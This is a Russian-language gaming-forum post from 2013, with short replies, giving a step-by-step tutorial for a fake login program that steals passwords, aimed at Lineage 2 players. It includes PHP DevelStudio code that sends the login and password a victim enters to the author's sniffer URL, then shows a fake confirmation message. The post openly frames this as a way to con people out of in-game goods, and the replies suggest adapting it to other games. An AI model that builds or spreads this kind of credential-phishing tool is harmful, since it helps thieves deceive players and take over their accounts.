Искал подобную тему, но не нашёл, если такова была, эту удалите.
Все я думаю когда то разводили людей на шмот различными способами и были довольны. Но сейчас я вам предложу вариант намного лучше. Я думал сделать эту тему в подполье, но решил донести её до всех.
И так приступим.
1. Заходим на этот [Ссылки могут видеть только зарегистрированные пользователи. ] и качаем программу php devel studio
2. Регистрируемся на этом [Ссылки могут видеть только зарегистрированные пользователи. ]
3. После того как авторизовались на сайте, нажимает на кнопку "Сниффер" и проходим регистрацию.
[Ссылки могут видеть только зарегистрированные пользователи. ]
4.После того как зашли в сниффер нажимаем "Настройки"
Листаем чуть в низ и находим эту строку копируем её и запоминаем.
[Ссылки могут видеть только зарегистрированные пользователи. ].
5.Переходим в программу.
6. Это наша рабочая форма где мы будем делать саму программу по хищению паролей. Это аналог Программы Borland Delphi 7, только немного упрощенная
7. 1. Выбираем компонент "Изображение", растягиваем его по форма, в свойствах вставляем желаемую картунку.
7. 2. Выбираем компонент "Текст" И размещаем два текста на форме, в свойствах пишем "Login" "Password", и так же можно поменять шрифт и т.д.
7. 3. Выбираем компонент "Поле для ввода" и размещаем на против двух текстов.
7. 4. Размещаем на форме компонент "Кнопка". Показано всё на скрине ниже.
7. 5. Выделаем компонент "Кнопка" и переходим во вкладку события в левой части программы, нажимаем "добавить событие->Клик", и у нас появляется событие "Клик".
7. 6. Нажимаем на кнопку "Редактировать" и вставляем следующий код, нажимаем ОК.
Код:
$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$url = "Сюда вставляете свой сниффер, который я говорил запомнить";
file_get_contents($url .? "?" . "login:" . $edit1. "|Password:" .? $edit2);
messageBox("Операция проведена" , "Сообщение");
7. 7. Нажимаем "Проект->Собрать программу" и дальше всё понятно.
Всё пороли которые будут вводить люди можно увидеть в Логе.
Можете по изучать программу, по эксперементировать, но то что предложил я это наиболее простой вариант.
P.S. От спасибки и + в репу не откажусь
Всегда ваш Frost
P.S.S. Если тема будет нужной и популярной я не буду против, если её закрепят в шапке раздела в важные
________________ Если помог - Поставь спасибо! Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Последний раз редактировалось frost987; 19.05.2013 в 21:42.
Ты хоть чувствуешь разницу моей темы и той что ты скинул?
И разницу в Visual Basic и php devel studio?
________________ Если помог - Поставь спасибо! Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Ты выложил ее в Линейке ,но также можно и другие игры
Да ты полностью прав, можно и к другим играм, но я сделал это для людей которые играют в Ла2.